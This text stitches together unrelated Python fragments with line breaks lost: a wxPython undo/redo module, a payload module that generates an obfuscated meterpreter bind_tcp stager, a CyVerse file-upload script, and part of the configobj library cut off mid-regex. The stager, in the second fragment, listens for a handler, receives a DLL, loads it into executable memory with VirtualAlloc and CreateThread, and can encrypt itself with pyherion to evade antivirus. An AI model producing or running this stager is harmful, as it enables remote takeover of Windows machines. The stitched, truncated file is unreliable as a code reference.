view.frame.tb.SetToolLongHelp(wx.ID_REDO, msg) class Undo: '''ABC for Undo*.''' def redo(self): # usually redo is same as undo self.undo() def destroy(self): pass class UndoCutDelete(Undo): label = 'cut/delete' def __init__(self, itemIndex, state, node): self.itemIndex = itemIndex self.state = state self.node = node def destroy(self): if self.node: self.node.unlink() self.node = None def undo(self): Presenter.unselect() # Updating DOM. Find parent node first parentItem = view.tree.ItemAtFullIndex(self.itemIndex[:-1]) parentNode = view.tree.GetPyData(parentItem) parentComp = Manager.getNodeComp(parentNode) nextItem = view.tree.ItemAtFullIndex(self.itemIndex) if nextItem: nextNode = parentComp.getTreeOrImplicitNode(view.tree.GetPyData(nextItem)) else: nextNode = None # Insert before next parentNode.insertBefore(self.node, nextNode) # Remember test window item if view.testWin.item is not None: testItemIndex = view.tree.ItemFullIndex(view.testWin.item) # Update tree and presenter view.tree.FlushSubtree(parentItem, parentNode) view.tree.SetFullState(self.state) # Restore test window item if view.testWin.item is not None: view.testWin.item = view.tree.ItemAtFullIndex(testItemIndex) item = view.tree.ItemAtFullIndex(self.itemIndex) view.tree.EnsureVisible(item) # This will generate events view.tree.SelectItem(item) def redo(self): item = view.tree.ItemAtFullIndex(self.itemIndex) Presenter.setData(item) self.node = Presenter.delete(item) # Undoing paste/create is the opposite of cut/delete, so we can reuse # UndoCutDelete class swapping undo<->redo class UndoPasteCreate(UndoCutDelete): label = 'paste/create' # The ctor is different because node is not known initially def __init__(self, itemIndex, state): self.itemIndex = itemIndex # new item index self.state = state # tree state self.node = None undo = UndoCutDelete.redo redo = UndoCutDelete.undo class UndoReplace(Undo): label = 'replace' def __init__(self, itemIndex, comp, node): self.itemIndex = itemIndex self.comp = comp self.node = node def destroy(self): if self.node: self.node.unlink() self.node = None def undo(self): # Replace current node with old node Presenter.unselect() item = view.tree.ItemAtFullIndex(self.itemIndex) Presenter.setData(item) comp = self.comp node = self.node data = wx.TreeItemData(node) parentItem = view.tree.GetItemParent(item) parentNode = view.tree.GetPyData(parentItem) self.node = view.tree.GetPyData(item) self.comp = Presenter.comp Presenter.container.replaceChild(parentNode, node, self.node) # Replace tree item: insert new, remove old label = comp.getTreeText(node) imageId = comp.getTreeImageId(node) item = view.tree.InsertItem(parentItem, item, label, imageId, data=data) view.tree.Delete(view.tree.GetPrevSibling(item)) Presenter.item = item # Add children for n in filter(is_object, node.childNodes): view.tree.AddNode(item, comp.getTreeNode(n)) view.tree.EnsureVisible(item) # Update panel view.tree.SelectItem(item) Presenter.setModified() class UndoEdit(Undo): '''Undo class for using in AttributePanel.''' label = 'edit' def __init__(self, item, page): self.index = view.tree.ItemFullIndex(item) self.page = page panel = view.panel.nb.GetPage(page).panel self.values = panel.GetValues() def undo(self): # Go back to the previous item Presenter.unselect() item = view.tree.ItemAtFullIndex(self.index) Presenter.setData(item) panel = view.panel.nb.GetPage(self.page).panel values = panel.GetValues() panel.SetValues(self.values) Presenter.update(item) self.values = values view.tree.SelectItem(item) class UndoGlobal(Undo): '''Undo class storing a copy of the complete tree. Can be used for non-frequent operations to avoid programming special undo classes.''' label = 'global' def __init__(self): self.mainNode = Model.mainNode.cloneNode(True) self.state = view.tree.GetFullState() def destroy(self): self.mainNode.unlink() def undo(self): # Exchange Model.mainNode,self.mainNode = \ self.mainNode,Model.dom.replaceChild(self.mainNode, Model.mainNode) # Replace testElem Model.testElem = Model.mainNode.childNodes[0] state = view.tree.GetFullState() Presenter.flushSubtree() view.tree.SetFullState(self.state) self.state = state def redo(self): self.undo() Presenter.unselect()
""" Custom-written pure python meterpreter/bind_tcp stager """ from tools.evasion.evasion_common import evasion_helpers from tools.evasion.evasion_common import encryption class PayloadModule: def __init__(self, cli_obj): # required options self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode" self.rating = "Excellent" self.name = "Pure Python Reverse TCP stager" self.path = "python/meterpreter/bind_tcp" self.cli_opts = cli_obj self.payload_source_code = "" self.language = "python" self.extension = "py" if cli_obj.ordnance_payload is not None: self.payload_type = cli_obj.ordnance_payload elif cli_obj.msfvenom is not None: self.payload_type = cli_obj.msfvenom elif not cli_obj.tool: self.payload_type = "" # optional # options we require user interaction for- format is {OPTION : [Value, Description]]} self.required_options = { "COMPILE_TO_EXE" : ["Y", "Compile to an executable"], "RHOST" : ["", "The listen target address"], "LPORT" : ["4444", "The listen port"], "USE_PYHERION" : ["N", "Use the pyherion encrypter"]} def generate(self): # randomize all of the variable names used shellCodeName = evasion_helpers.randomString() socketName = evasion_helpers.randomString() clientSocketName = evasion_helpers.randomString() getDataMethodName = evasion_helpers.randomString() fdBufName = evasion_helpers.randomString() rcvStringName = evasion_helpers.randomString() rcvCStringName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() tempShellcodeName = evasion_helpers.randomString() shellcodeBufName = evasion_helpers.randomString() fpName = evasion_helpers.randomString() tempCBuffer = evasion_helpers.randomString() payload_code = "import struct, socket, binascii, ctypes, random, time\n" # socket and shellcode variables that need to be kept global payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payload_code += "def %s():\n" %(getDataMethodName) payload_code += "\ttry:\n" payload_code += "\t\tglobal %s\n" %(socketName) payload_code += "\t\tglobal %s\n" %(clientSocketName) # build the socket and connect to the handler payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName) payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0])) payload_code += "\t\t%s.listen(1)\n" % (socketName) payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName) # pack the underlying socket file descriptor into a c structure payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName) # unpack the length of the payload, received as a 4 byte array from the handler payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName) payload_code += "\t\t" + rcvStringName + " = b\" \"\n" # receive ALL of the payload .dll data payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName) payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName) # copy the socket fd in payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName) payload_code += "\t\treturn %s\n" % (rcvCStringName) payload_code += "\texcept: return None\n" # build the method that injects the .dll into memory payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName) payload_code += "\tif %s != None:\n" %(tempShellcodeName) payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName) # allocate enough virtual memory to stuff the .dll in payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName) # virtual lock to prevent the memory from paging out to disk payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName) payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName) # copy the .dll into the allocated memory payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName) # kick the thread off to execute the .dll payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName) # wait for the .dll execution to finish payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n" # download the stager payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName) # inject what we grabbed payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
#!/usr/bin/env python3 import os import sys import re import tempfile from subprocess import run from shutil import copyfile args = sys.argv[1:] in_dir = args[0] if len(args) == 1 else os.getcwd() if not os.path.isabs(in_dir): in_dir = os.path.abspath(in_dir) if not os.path.isdir(in_dir): print('"{}" is not a directory'.format(in_dir)) sys.exit(1) work_dir = os.environ['WORK'] app_dir = re.sub(work_dir, '', in_dir) if app_dir.startswith('/'): app_dir = app_dir[1:] app_base = os.path.split(app_dir)[0] print('Looking in "{}"'.format(in_dir)) manifests = [] for root, _, filenames in os.walk(in_dir): for filename in filenames: if filename == 'MANIFEST': manifests.append(os.path.join(root, filename)) num = len(manifests) print('Found {} MANIFEST file{} in "{}"'.format(num, '' if num == 1 else 's', in_dir)) if num == 0: sys.exit(1) file_num = 0 tmp_dir = os.path.join(tempfile.mkdtemp(), app_dir) if not os.path.isdir(tmp_dir): os.makedirs(tmp_dir) for manifest in manifests: man_dir = os.path.dirname(manifest) print('Processing {}'.format(manifest)) for file in open(manifest): file = file.rstrip() path = re.sub('^\.', man_dir, file) file_num += 1 print('{:3}: {}'.format(file_num, path)) if os.path.isfile(path): filedir = os.path.dirname(re.sub(in_dir, '', path)) if filedir.startswith('/'): filedir = filedir[1:] partial = os.path.join(tmp_dir, filedir) if not os.path.isdir(partial): os.makedirs(partial) copyfile(path, os.path.join(partial, os.path.basename(file))) dest = 'kyclark/applications/' + app_base upload = '/home1/03137/kyclark/cyverse-cli/bin/files-upload' run([upload, '-F', tmp_dir, dest]) print('Done, check "{}"'.format(dest))
# configobj.py # A config file reader/writer that supports nested sections in config files. # Copyright (C) 2005-2014: # (name) : (email) # Michael Foord: fuzzyman AT voidspace DOT org DOT uk # Nicola Larosa: nico AT tekNico DOT net # Rob Dennis: rdennis AT gmail DOT com # Eli Courtwright: eli AT courtwright DOT org # This software is licensed under the terms of the BSD license. # http://opensource.org/licenses/BSD-3-Clause # ConfigObj 5 - main repository for documentation and issue tracking: # https://github.com/DiffSK/configobj import os import re import sys from codecs import BOM_UTF8, BOM_UTF16, BOM_UTF16_BE, BOM_UTF16_LE from lib.six import six from _version import __version__ # imported lazily to avoid startup performance hit if it isn't used compiler = None # A dictionary mapping BOM to # the encoding to decode with, and what to set the # encoding attribute to. BOMS = { BOM_UTF8: ('utf_8', None), BOM_UTF16_BE: ('utf16_be', 'utf_16'), BOM_UTF16_LE: ('utf16_le', 'utf_16'), BOM_UTF16: ('utf_16', 'utf_16'), } # All legal variants of the BOM codecs. # TODO: the list of aliases is not meant to be exhaustive, is there a # better way ? BOM_LIST = { 'utf_16': 'utf_16', 'u16': 'utf_16', 'utf16': 'utf_16', 'utf-16': 'utf_16', 'utf16_be': 'utf16_be', 'utf_16_be': 'utf16_be', 'utf-16be': 'utf16_be', 'utf16_le': 'utf16_le', 'utf_16_le': 'utf16_le', 'utf-16le': 'utf16_le', 'utf_8': 'utf_8', 'u8': 'utf_8', 'utf': 'utf_8', 'utf8': 'utf_8', 'utf-8': 'utf_8', } # Map of encodings to the BOM to write. BOM_SET = { 'utf_8': BOM_UTF8, 'utf_16': BOM_UTF16, 'utf16_be': BOM_UTF16_BE, 'utf16_le': BOM_UTF16_LE, None: BOM_UTF8 } def match_utf8(encoding): return BOM_LIST.get(encoding.lower()) == 'utf_8' # Quote strings used for writing values squot = "'%s'" dquot = '"%s"' noquot = "%s" wspace_plus = ' \r\n\v\t\'"' tsquot = '"""%s"""' tdquot = "'''%s'''" # Sentinel for use in getattr calls to replace hasattr MISSING = object() __all__ = ( 'DEFAULT_INDENT_TYPE', 'DEFAULT_INTERPOLATION', 'ConfigObjError', 'NestingError', 'ParseError', 'DuplicateError', 'ConfigspecError', 'ConfigObj', 'SimpleVal', 'InterpolationError', 'InterpolationLoopError', 'MissingInterpolationOption', 'RepeatSectionError', 'ReloadError', 'UnreprError', 'UnknownType', 'flatten_errors', 'get_extra_values' ) DEFAULT_INTERPOLATION = 'configparser' DEFAULT_INDENT_TYPE = ' ' MAX_INTERPOL_DEPTH = 10 OPTION_DEFAULTS = { 'interpolation': True, 'raise_errors': False, 'list_values': True, 'create_empty': False, 'file_error': False, 'configspec': None, 'stringify': True, # option may be set to one of ('', ' ', '\t') 'indent_type': None, 'encoding': None, 'default_encoding': None, 'unrepr': False, 'write_empty_values': False, } # this could be replaced if six is used for compatibility, or there are no # more assertions about items being a string def getObj(s): global compiler if compiler is None: import compiler s = "a=" + s p = compiler.parse(s) return p.getChildren()[1].getChildren()[0].getChildren()[1] class UnknownType(Exception): pass class Builder(object): def build(self, o): if m is None: raise UnknownType(o.__class__.__name__) return m(o) def build_List(self, o): return list(map(self.build, o.getChildren())) def build_Const(self, o): return o.value def build_Dict(self, o): d = {} i = iter(map(self.build, o.getChildren())) for el in i: d[el] = next(i) return d def build_Tuple(self, o): return tuple(self.build_List(o)) def build_Name(self, o): if o.name == 'None': return None if o.name == 'True': return True if o.name == 'False': return False # An undefined Name raise UnknownType('Undefined Name') def build_Add(self, o): real, imag = list(map(self.build_Const, o.getChildren())) try: real = float(real) except TypeError: raise UnknownType('Add') if not isinstance(imag, complex) or imag.real != 0.0: raise UnknownType('Add') return real+imag def build_Getattr(self, o): parent = self.build(o.expr) return getattr(parent, o.attrname) def build_UnarySub(self, o): return -self.build_Const(o.getChildren()[0]) def build_UnaryAdd(self, o): return self.build_Const(o.getChildren()[0]) _builder = Builder() def unrepr(s): if not s: return s # this is supposed to be safe import ast return ast.literal_eval(s) class ConfigObjError(SyntaxError): """ This is the base class for all errors that ConfigObj raises. It is a subclass of SyntaxError. """ def __init__(self, message='', line_number=None, line=''): self.line = line self.line_number = line_number SyntaxError.__init__(self, message) class NestingError(ConfigObjError): """ This error indicates a level of nesting that doesn't match. """ class ParseError(ConfigObjError): """ This error indicates that a line is badly written. It is neither a valid ``key = value`` line, nor a valid section marker line. """ class ReloadError(IOError): """ A 'reload' operation failed. This exception is a subclass of ``IOError``. """ def __init__(self): IOError.__init__(self, 'reload failed, filename is not set.') class DuplicateError(ConfigObjError): """ The keyword or section specified already exists. """ class ConfigspecError(ConfigObjError): """ An error occured whilst parsing a configspec. """ class InterpolationError(ConfigObjError): """Base class for the two interpolation errors.""" class InterpolationLoopError(InterpolationError): """Maximum interpolation depth exceeded in string interpolation.""" def __init__(self, option): InterpolationError.__init__( self, 'interpolation loop detected in value "%s".' % option) class RepeatSectionError(ConfigObjError): """ This error indicates additional sections in a section with a ``__many__`` (repeated) section. """ class MissingInterpolationOption(InterpolationError): """A value specified for interpolation was missing.""" def __init__(self, option): msg = 'missing option "%s" in interpolation.' % option InterpolationError.__init__(self, msg) class UnreprError(ConfigObjError): """An error parsing in unrepr mode.""" class InterpolationEngine(object): """ A helper class to help perform string interpolation. This class is an abstract base class; its descendants perform the actual work. """ # compiled regexp to use in self.interpolate() _KEYCRE = re.compile(r"%\(([^)]*)\)s") _cookie = '%' def __init__(self, section): # the Section instance that "owns" this engine self.section = section def interpolate(self, key, value): # short-cut if not self._cookie in value: return value def recursive_interpolate(key, value, section, backtrail): """The function that does the actual work. ``value``: the string we're trying to interpolate. ``section``: the section in which that string was found ``backtrail``: a dict to keep track of where we've been, to detect and prevent infinite recursion loops This is similar to a depth-first-search algorithm. """ # Have we been here already? if (key, section.name) in backtrail: # Yes - infinite loop detected raise InterpolationLoopError(key) # Place a marker on our backtrail so we won't come back here again backtrail[(key, section.name)] = 1 # Now start the actual work match = self._KEYCRE.search(value) while match: # The actual parsing of the match is implementation-dependent, # so delegate to our helper function k, v, s = self._parse_match(match) if k is None: # That's the signal that no further interpolation is needed replacement = v else: # Further interpolation may be needed to obtain final value replacement = recursive_interpolate(k, v, s, backtrail) # Replace the matched string with its final value start, end = match.span() value = ''.join((value[:start], replacement, value[end:])) new_search_start = start + len(replacement) # Pick up the next interpolation key, if any, for next time # through the while loop match = self._KEYCRE.search(value, new_search_start) # Now safe to come back here again; remove marker from backtrail del backtrail[(key, section.name)] return value # Back in interpolate(), all we have to do is kick off the recursive # function with appropriate starting values value = recursive_interpolate(key, value, self.section, {}) return value def _fetch(self, key): """Helper function to fetch values from owning section. Returns a 2-tuple: the value, and the section where it was found. """ # switch off interpolation before we try and fetch anything ! save_interp = self.section.main.interpolation self.section.main.interpolation = False # Start at section that "owns" this InterpolationEngine current_section = self.section while True: # try the current section first val = current_section.get(key) if val is not None and not isinstance(val, Section): break # try "DEFAULT" next val = current_section.get('DEFAULT', {}).get(key) if val is not None and not isinstance(val, Section): break # move up to parent and try again # top-level's parent is itself if current_section.parent is current_section: # reached top level, time to give up break current_section = current_section.parent # restore interpolation to previous value before returning self.section.main.interpolation = save_interp if val is None: raise MissingInterpolationOption(key) return val, current_section def _parse_match(self, match): """Implementation-dependent helper function. Will be passed a match object corresponding to the interpolation key we just found (e.g., "%(foo)s" or "$foo"). Should look up that key in the appropriate config file section (using the ``_fetch()`` helper function) and return a 3-tuple: (key, value, section) ``key`` is the name of the key we're looking for ``value`` is the value found for that key ``section`` is a reference to the section where it was found ``key`` and ``section`` should be None if no further interpolation should be performed on the resulting value (e.g., if we interpolated "$$" and returned "$"). """ raise NotImplementedError() class ConfigParserInterpolation(InterpolationEngine): """Behaves like ConfigParser.""" _cookie = '%' _KEYCRE = re.compile(r"%\(([^)]*)\)s") def _parse_match(self, match): key = match.group(1) value, section = self._fetch(key) return key, value, section class TemplateInterpolation(InterpolationEngine): """Behaves like string.Template.""" _cookie = '$' _delimiter = '$' _KEYCRE = re.compile(r""" \$(?: (?P<escaped>\$) | # Two $ signs (?P<named>[_a-z][_a-z0-9]*) | # $name format {(?P<braced>[^}]*)} # ${name} format ) """, re.IGNORECASE | re.VERBOSE) def _parse_match(self, match): # Valid name (in or out of braces): fetch value from section key = match.group('named') or match.group('braced') if key is not None: value, section = self._fetch(key) return key, value, section # Escaped delimiter (e.g., $$): return single delimiter if match.group('escaped') is not None: # Return None for key and section to indicate it's time to stop return None, self._delimiter, None # Anything else: ignore completely, just return it unchanged return None, match.group(), None interpolation_engines = { 'configparser': ConfigParserInterpolation, 'template': TemplateInterpolation, } def __newobj__(cls, *args): # Hack for pickle return cls.__new__(cls, *args) class Section(dict): """ A dictionary-like object that represents a section in a config file. It does string interpolation if the 'interpolation' attribute of the 'main' object is set to True. Interpolation is tried first from this object, then from the 'DEFAULT' section of this object, next from the parent and its 'DEFAULT' section, and so on until the main object is reached. A Section will behave like an ordered dictionary - following the order of the ``scalars`` and ``sections`` attributes. You can use this to change the order of members. Iteration follows the order: scalars, then sections. """ def __setstate__(self, state): dict.update(self, state[0]) self.__dict__.update(state[1]) def __reduce__(self): state = (dict(self), self.__dict__) return (__newobj__, (self.__class__,), state) def __init__(self, parent, depth, main, indict=None, name=None): """ * parent is the section above * depth is the depth level of this section * main is the main ConfigObj * indict is a dictionary to initialise the section with """ if indict is None: indict = {} dict.__init__(self) # used for nesting level *and* interpolation self.parent = parent # used for the interpolation attribute self.main = main # level of nesting depth of this Section self.depth = depth # purely for information self.name = name # self._initialise() # we do this explicitly so that __setitem__ is used properly # (rather than just passing to ``dict.__init__``) for entry, value in indict.items(): self[entry] = value def _initialise(self): # the sequence of scalar values in this Section self.scalars = [] # the sequence of sections in this Section self.sections = [] # for comments :-) self.comments = {} self.inline_comments = {} # the configspec self.configspec = None # for defaults self.defaults = [] self.default_values = {} self.extra_values = [] self._created = False def _interpolate(self, key, value): try: # do we already have an interpolation engine? engine = self._interpolation_engine except AttributeError: # not yet: first time running _interpolate(), so pick the engine name = self.main.interpolation if name == True: # note that "if name:" would be incorrect here # backwards-compatibility: interpolation=True means use default name = DEFAULT_INTERPOLATION name = name.lower() # so that "Template", "template", etc. all work class_ = interpolation_engines.get(name, None) if class_ is None: # invalid value for self.main.interpolation self.main.interpolation = False return value else: # save reference to engine so we don't have to do this again engine = self._interpolation_engine = class_(self) # let the engine do the actual work return engine.interpolate(key, value) def __getitem__(self, key): """Fetch the item and do string interpolation.""" val = dict.__getitem__(self, key) if self.main.interpolation: if isinstance(val, six.string_types): return self._interpolate(key, val) if isinstance(val, list): def _check(entry): if isinstance(entry, six.string_types): return self._interpolate(key, entry) return entry new = [_check(entry) for entry in val] if new != val: return new return val def __setitem__(self, key, value, unrepr=False): """ Correctly set a value. Making dictionary values Section instances. (We have to special case 'Section' instances - which are also dicts) Keys must be strings. Values need only be strings (or lists of strings) if ``main.stringify`` is set. ``unrepr`` must be set when setting a value to a dictionary, without creating a new sub-section. """ if not isinstance(key, six.string_types): raise ValueError('The key "%s" is not a string.' % key) # add the comment if key not in self.comments: self.comments[key] = [] self.inline_comments[key] = '' # remove the entry from defaults if key in self.defaults: self.defaults.remove(key) # if isinstance(value, Section): if key not in self: self.sections.append(key) dict.__setitem__(self, key, value) elif isinstance(value, dict) and not unrepr: # First create the new depth level, # then create the section if key not in self: self.sections.append(key) new_depth = self.depth + 1 dict.__setitem__( self, key, Section( self, new_depth, self.main, indict=value, name=key)) else: if key not in self: self.scalars.append(key) if not self.main.stringify: if isinstance(value, six.string_types): pass elif isinstance(value, (list, tuple)): for entry in value: if not isinstance(entry, six.string_types): raise TypeError('Value is not a string "%s".' % entry) else: raise TypeError('Value is not a string "%s".' % value) dict.__setitem__(self, key, value) def __delitem__(self, key): """Remove items from the sequence when deleting.""" dict. __delitem__(self, key) if key in self.scalars: self.scalars.remove(key) else: self.sections.remove(key) del self.comments[key] del self.inline_comments[key] def get(self, key, default=None): """A version of ``get`` that doesn't bypass string interpolation.""" try: return self[key] except KeyError: return default def update(self, indict): """ A version of update that uses our ``__setitem__``. """ for entry in indict: self[entry] = indict[entry] def pop(self, key, default=MISSING): """ 'D.pop(k[,d]) -> v, remove specified key and return the corresponding value. If key is not found, d is returned if given, otherwise KeyError is raised' """ try: val = self[key] except KeyError: if default is MISSING: raise val = default else: del self[key] return val def popitem(self): """Pops the first (key,val)""" sequence = (self.scalars + self.sections) if not sequence: raise KeyError(": 'popitem(): dictionary is empty'") key = sequence[0] val = self[key] del self[key] return key, val def clear(self): """ A version of clear that also affects scalars/sections Also clears comments and configspec. Leaves other attributes alone : depth/main/parent are not affected """ dict.clear(self) self.scalars = [] self.sections = [] self.comments = {} self.inline_comments = {} self.configspec = None self.defaults = [] self.extra_values = [] def setdefault(self, key, default=None): """A version of setdefault that sets sequence if appropriate.""" try: return self[key] except KeyError: self[key] = default return self[key] def items(self): """D.items() -> list of D's (key, value) pairs, as 2-tuples""" return list(zip((self.scalars + self.sections), list(self.values()))) def keys(self): """D.keys() -> list of D's keys""" return (self.scalars + self.sections) def values(self): """D.values() -> list of D's values""" return [self[key] for key in (self.scalars + self.sections)] def iteritems(self): """D.iteritems() -> an iterator over the (key, value) items of D""" return iter(list(self.items())) def iterkeys(self): """D.iterkeys() -> an iterator over the keys of D""" return iter((self.scalars + self.sections)) __iter__ = iterkeys def itervalues(self): """D.itervalues() -> an iterator over the values of D""" return iter(list(self.values())) def __repr__(self): """x.__repr__() <==> repr(x)""" def _getval(key): try: return self[key] except MissingInterpolationOption: return dict.__getitem__(self, key) return '{%s}' % ', '.join([('%s: %s' % (repr(key), repr(_getval(key)))) for key in (self.scalars + self.sections)]) __str__ = __repr__ __str__.__doc__ = "x.__str__() <==> str(x)" # Extra methods - not in a normal dictionary def dict(self): """ Return a deepcopy of self as a dictionary. All members that are ``Section`` instances are recursively turned to ordinary dictionaries - by calling their ``dict`` method. >>> n = a.dict() >>> n == a 1 >>> n is a 0 """ newdict = {} for entry in self: this_entry = self[entry] if isinstance(this_entry, Section): this_entry = this_entry.dict() elif isinstance(this_entry, list): # create a copy rather than a reference this_entry = list(this_entry) elif isinstance(this_entry, tuple): # create a copy rather than a reference this_entry = tuple(this_entry) newdict[entry] = this_entry return newdict def merge(self, indict): """ A recursive update - useful for merging config files. >>> a = '''[section1] ... option1 = True ... [[subsection]] ... more_options = False ... # end of file'''.splitlines() >>> b = '''# File is user.ini ... [section1] ... option1 = False ... # end of file'''.splitlines() >>> c1 = ConfigObj(b) >>> c2 = ConfigObj(a) >>> c2.merge(c1) >>> c2 ConfigObj({'section1': {'option1': 'False', 'subsection': {'more_options': 'False'}}}) """ for key, val in list(indict.items()): if (key in self and isinstance(self[key], dict) and isinstance(val, dict)): self[key].merge(val) else: self[key] = val def rename(self, oldkey, newkey): """ Change a keyname to another, without changing position in sequence. Implemented so that transformations can be made on keys, as well as on values. (used by encode and decode) Also renames comments. """ if oldkey in self.scalars: the_list = self.scalars elif oldkey in self.sections: the_list = self.sections else: raise KeyError('Key "%s" not found.' % oldkey) pos = the_list.index(oldkey) # val = self[oldkey] dict.__delitem__(self, oldkey) dict.__setitem__(self, newkey, val) the_list.remove(oldkey) the_list.insert(pos, newkey) comm = self.comments[oldkey] inline_comment = self.inline_comments[oldkey] del self.comments[oldkey] del self.inline_comments[oldkey] self.comments[newkey] = comm self.inline_comments[newkey] = inline_comment def walk(self, function, raise_errors=True, call_on_sections=False, **keywargs): """ Walk every member and call a function on the keyword and value. Return a dictionary of the return values If the function raises an exception, raise the errror unless ``raise_errors=False``, in which case set the return value to ``False``. Any unrecognised keyword arguments you pass to walk, will be pased on to the function you pass in. Note: if ``call_on_sections`` is ``True`` then - on encountering a subsection, *first* the function is called for the *whole* subsection, and then recurses into it's members. This means your function must be able to handle strings, dictionaries and lists. This allows you to change the key of subsections as well as for ordinary members. The return value when called on the whole subsection has to be discarded. See the encode and decode methods for examples, including functions. .. admonition:: caution You can use ``walk`` to transform the names of members of a section but you mustn't add or delete members. >>> config = '''[XXXXsection] ... XXXXkey = XXXXvalue'''.splitlines() >>> cfg = ConfigObj(config) >>> cfg ConfigObj({'XXXXsection': {'XXXXkey': 'XXXXvalue'}}) >>> def transform(section, key): ... val = section[key] ... newkey = key.replace('XXXX', 'CLIENT1') ... section.rename(key, newkey) ... if isinstance(val, (tuple, list, dict)): ... pass ... else: ... val = val.replace('XXXX', 'CLIENT1') ... section[newkey] = val >>> cfg.walk(transform, call_on_sections=True) {'CLIENT1section': {'CLIENT1key': None}} >>> cfg ConfigObj({'CLIENT1section': {'CLIENT1key': 'CLIENT1value'}}) """ out = {} # scalars first for i in range(len(self.scalars)): entry = self.scalars[i] try: val = function(self, entry, **keywargs) # bound again in case name has changed entry = self.scalars[i] out[entry] = val except Exception: if raise_errors: raise else: entry = self.scalars[i] out[entry] = False # then sections for i in range(len(self.sections)): entry = self.sections[i] if call_on_sections: try: function(self, entry, **keywargs) except Exception: if raise_errors: raise else: entry = self.sections[i] out[entry] = False # bound again in case name has changed entry = self.sections[i] # previous result is discarded out[entry] = self[entry].walk( function, raise_errors=raise_errors, call_on_sections=call_on_sections, **keywargs) return out def as_bool(self, key): """ Accepts a key as input. The corresponding value must be a string or the objects (``True`` or 1) or (``False`` or 0). We allow 0 and 1 to retain compatibility with Python 2.2. If the string is one of ``True``, ``On``, ``Yes``, or ``1`` it returns ``True``. If the string is one of ``False``, ``Off``, ``No``, or ``0`` it returns ``False``. ``as_bool`` is not case sensitive. Any other input will raise a ``ValueError``. >>> a = ConfigObj() >>> a['a'] = 'fish' >>> a.as_bool('a') Traceback (most recent call last): ValueError: Value "fish" is neither True nor False >>> a['b'] = 'True' >>> a.as_bool('b') 1 >>> a['b'] = 'off' >>> a.as_bool('b') 0 """ val = self[key] if val == True: return True elif val == False: return False else: try: if not isinstance(val, six.string_types): # TODO: Why do we raise a KeyError here? raise KeyError() else: return self.main._bools[val.lower()] except KeyError: raise ValueError('Value "%s" is neither True nor False' % val) def as_int(self, key): """ A convenience method which coerces the specified value to an integer. If the value is an invalid literal for ``int``, a ``ValueError`` will be raised. >>> a = ConfigObj() >>> a['a'] = 'fish' >>> a.as_int('a') Traceback (most recent call last): ValueError: invalid literal for int() with base 10: 'fish' >>> a['b'] = '1' >>> a.as_int('b') 1 >>> a['b'] = '3.2' >>> a.as_int('b') Traceback (most recent call last): ValueError: invalid literal for int() with base 10: '3.2' """ return int(self[key]) def as_float(self, key): """ A convenience method which coerces the specified value to a float. If the value is an invalid literal for ``float``, a ``ValueError`` will be raised. >>> a = ConfigObj() >>> a['a'] = 'fish' >>> a.as_float('a') #doctest: +IGNORE_EXCEPTION_DETAIL Traceback (most recent call last): ValueError: invalid literal for float(): fish >>> a['b'] = '1' >>> a.as_float('b') 1.0 >>> a['b'] = '3.2' >>> a.as_float('b') #doctest: +ELLIPSIS 3.2... """ return float(self[key]) def as_list(self, key): """ A convenience method which fetches the specified value, guaranteeing that it is a list. >>> a = ConfigObj() >>> a['a'] = 1 >>> a.as_list('a') [1] >>> a['a'] = (1,) >>> a.as_list('a') [1] >>> a['a'] = [1] >>> a.as_list('a') [1] """ result = self[key] if isinstance(result, (tuple, list)): return list(result) return [result] def restore_default(self, key): """ Restore (and return) default value for the specified key. This method will only work for a ConfigObj that was created with a configspec and has been validated. If there is no default value for this key, ``KeyError`` is raised. """ default = self.default_values[key] dict.__setitem__(self, key, default) if key not in self.defaults: self.defaults.append(key) return default def restore_defaults(self): """ Recursively restore default values to all members that have them. This method will only work for a ConfigObj that was created with a configspec and has been validated. It doesn't delete or modify entries without default values. """ for key in self.default_values: self.restore_default(key) for section in self.sections: self[section].restore_defaults() class ConfigObj(Section): """An object to read, create, and write config files.""" _keyword = re.compile(r'''^ # line start (\s*) # indentation ( # keyword (?:".*?")| # double quotes (?:'.*?')| # single quotes (?:[^'"=].*?) # no quotes ) \s*=\s* # divider (.*) # value (including list values and comments) $ # line end ''', re.VERBOSE) _sectionmarker = re.compile(r'''^ 